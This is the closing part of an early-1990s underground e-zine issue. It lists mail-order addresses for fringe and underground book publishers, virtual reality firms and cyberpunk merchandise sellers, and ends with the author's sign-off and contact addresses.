             -hard to find/underground books
              catalog is a whopping $9 (400 pages)

Autodesk, Inc.
2320 Marinship Way
Sausalito, CA   94965
           -makers of Chaos software. $59.95

Books by Phone
Box 522
Berkeley, CA   94701
800.858.2665 (orders)
510.548.2124 (info)
           -large library of hard-to-find books related to CP, drugs, etc.
            nice resource, but you pay a lot for it :-)

Consumertronics
2011 Crescent Dr.
PO Drawer 537
Alamogordo, NM   88310
505.434.0234
500.434.0234 (fax - orders only)
             -hacking/phreaking manuals

Feral House Productions
PO Box 861893
Los Angeles, CA 90086-1893
        -obscure books

Further Connections
Waves Forest
PO Box 768
Monterey, CA 93940
        -fringe science

Kodak's Center for Creative Imagining
800.428.7400
        -offers classes in electronic imaging "taught by artists and industry
                experts with state-of-the-art technology"
         anyway, call 'em and ask 'em for their catalogue - might be decent
         (at least the ad in Mondo looks nifty :-)

Loopmanics, Ltd.
PO Box 1197
Port Townsend, WA   98368
     -carries a large collection of underground/hard-to-find books and stuff
      send for a catalog

NewTek, Inc.
215 SE 8th St.
Topeka, KS   66603
800.843.8934
        -makers of the great Video Toaster
         send 'em $4.95 for a demo tape of what the Video Toaster does

Paladin Press
PO Box 1307
Boulder, CO 80306
        -obscure books

Re/Search Publications
70 Romolo Street #B
San Franssico, CA 94133

Rip Off Press
PO Box 4686
Auburn, CA 96504

Sense8
1001 Bridgeway #477
sausalito, CA   94965
415.331.6318
415.331.9148 (fax)
             -vr firm

Survival Books
11106 Magnolia Blvd.
North Hollywood, CA 91601

TOPYUS (Psychic TV)
PO Box 18223
Denver, CO   80218
        -Genesis P-Orridge's Psychic TV
         send a SASE for info on Psychic TV, catalogs, albums, t-shirts,
              videos, books, etc.

Virtual Research
1313 Socorro Ave
Sunnyvale, CA   94089
408.739.7114
        -a vr firm

VPL Research, Inc.
656 Bair Island Rd. Suite 304
Redwood, CA   94063
415.361.1710
        -Jaron Lanier's famous virtual reality firm

Zentech
Box 138
Morgan Bay Rd.
Surry, ME    04684
       -cyberpunk, virtual reality merchandise

_____________________________________________________________________________
                                                                 |           |
                                                                 |  see ya!  |
                                                                 |___________|
Welp, that looks like it for now.  Have fun!

Again, if you have any questions/comments/concerns/criticisms/corrections or
any additional info, please contact me at ahawks@nyx.cs.du.edu - or on The
Kracker Box BBS at 303.438.1481.

I can be reached at:  ahawks@nyx.cs.du.edu, or ahawks@isis.cs.du.edu.

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

    Personal Notes: Hello to the RI Hackers from the New Texas Hacker.
                    Metacom2 send me mail!

    Well folks, thats all for DFP #4.

    Keep that e-mail coming!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 -= Max Cray =-                                           Freedom
 Net:     underg%max@uunet.uu.net                         Justice
 UUCP:    ...!uunet!underg!max                            Equality
 CI$:     76334,2203                                      Responsibility